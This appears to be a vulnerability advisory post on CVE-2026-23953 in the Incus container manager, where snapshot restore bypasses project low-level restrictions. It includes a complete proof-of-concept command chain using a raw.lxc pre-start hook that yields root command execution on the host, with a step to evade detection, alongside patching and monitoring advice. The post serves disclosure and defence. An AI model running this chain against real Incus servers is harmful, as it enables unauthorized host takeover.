Listen to this Post
How CVE-2026-23953 Works
CVE-2026-23953 is a high-severity vulnerability in Incus, a system container and virtual machine manager. The core issue lies in how Incus handles instance snapshots in relation to project-level security restrictions.
Incus allows administrators to restrict projects using the `restricted.containers.lowlevel=block` setting. This configuration is designed to prevent users from using low-level container options, such as raw LXC configuration (raw.lxc) or raw QEMU configuration (raw.qemu). These raw configurations can be used to define lifecycle hooks (e.g., lxc.hook.pre-start) that execute commands on the host.
The vulnerability arises because instance snapshots do not respect this `restricted.containers.lowlevel=block` setting. When an instance is snapshotted, the low-level configuration (including malicious hooks) is preserved in the snapshot’s metadata. When this snapshot is later restored, the restrictions are not re-evaluated, allowing the previously blocked raw configuration to take effect.
This flaw is particularly dangerous because snapshots can be moved between servers. An attacker with access to an unrestricted project can:
1. Create a malicious instance with a raw hook configured (e.g., raw.lxc='lxc.hook.pre-start = /bin/sh -c "/bin/id > /lxc-hook-prestart"').
2. Create a snapshot of this malicious instance.
- Remove the raw configuration from the instance itself (to bypass basic checks).
- Move the instance (along with its snapshot) to a restricted project on a target server.
- Restore the snapshot, which re-injects the malicious hook.
- Start the instance, triggering the hook and executing arbitrary commands as root on the host.
In practice, this allows a malicious actor to completely bypass project restrictions and achieve arbitrary command execution with root privileges on the Incus server.
DailyCVE Form
Platform: Incus
Version: 6.20.0 and below
Vulnerability: Restriction Bypass
Severity: High (8.7)
date: 2026-01-22
Prediction: 2026-02-15
What Undercode Say: Analytics
The vulnerability stems from a logic flaw in the snapshot restoration process. The restriction check is performed at instance creation and modification time but is not re-evaluated when a snapshot is restored. This is a classic case of time-of-check to time-of-use (TOCTOU) bypass, where the security control is not applied consistently across all state transitions.
Bash Commands and PoC:
On the remote, restricted project incus project set rem:project restricted.true incus project set rem:project restricted.containers.lowlevel=block On the local, unrestricted project incus init images:debian/trixie rce-raw-lxc incus config set rce-raw-lxc raw.lxc='lxc.hook.pre-start = /bin/sh -c "/bin/id > /lxc-hook-prestart"' incus snapshot create rce-raw-lxc snap0 Remove the raw config to avoid detection incus config unset rce-raw-lxc raw.lxc Transfer the instance to the restricted project incus move rce-raw-lxc rem: --mode push Restore the snapshot (this re-injects the hook) incus snapshot restore rem:rce-raw-lxc snap0 Start the instance, triggering the hook incus start rem:rce-raw-lxc
Code Snippet (Vulnerable Logic):
// Vulnerable: Missing validation during snapshot restore
func (s snapshot) Restore() error {
// The low-level config from the snapshot is applied directly
// without checking the project's restricted.containers.lowlevel setting
return s.instance.applyConfig(s.snapshotConfig)
}
Exploit
An attacker can exploit this vulnerability by:
- Crafting a Malicious Instance: In an unrestricted project, create an instance with a `raw.lxc` or `raw.qemu` hook that executes arbitrary commands.
- Creating a Snapshot: Take a snapshot of this instance to embed the malicious configuration.
- Cleaning the Instance: Remove the raw configuration from the instance to avoid triggering alerts.
- Moving the Instance: Transfer the instance (with its snapshot) to a restricted project on a target server.
- Restoring the Snapshot: Restore the snapshot, which overwrites the instance’s configuration with the malicious hooks.
- Triggering the Payload: Start the instance, causing the hook to execute as root on the host.
This exploit chain allows a user with `can_edit` permissions on a VM or container instance to escalate privileges to host root.
Protection
- Update Incus: Apply the security update provided by your distribution. The fix is included in Incus versions 6.0.6 and 6.21.0. Debian trixie users should update to
6.0.4-2+deb13u7. - Restrict Snapshot Operations: Limit which users can create, restore, or move snapshots, especially across project boundaries.
- Audit Raw Configurations: Regularly audit instances for the presence of `raw.lxc` and `raw.qemu` configurations, even in restricted projects.
- Monitor for Suspicious Hooks: Implement monitoring to detect the execution of unexpected lifecycle hooks on the host.
Impact
- Bypass of Project Restrictions: The `restricted.containers.lowlevel=block` setting is rendered ineffective, allowing low-level container options in restricted projects.
- Arbitrary Command Execution: An attacker can execute arbitrary commands on the Incus server with root privileges.
- Privilege Escalation: A user with `can_edit` permissions on an instance can escalate to host root.
- Cluster Compromise: In a clustered environment, this vulnerability can be used to compromise the entire Incus cluster.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
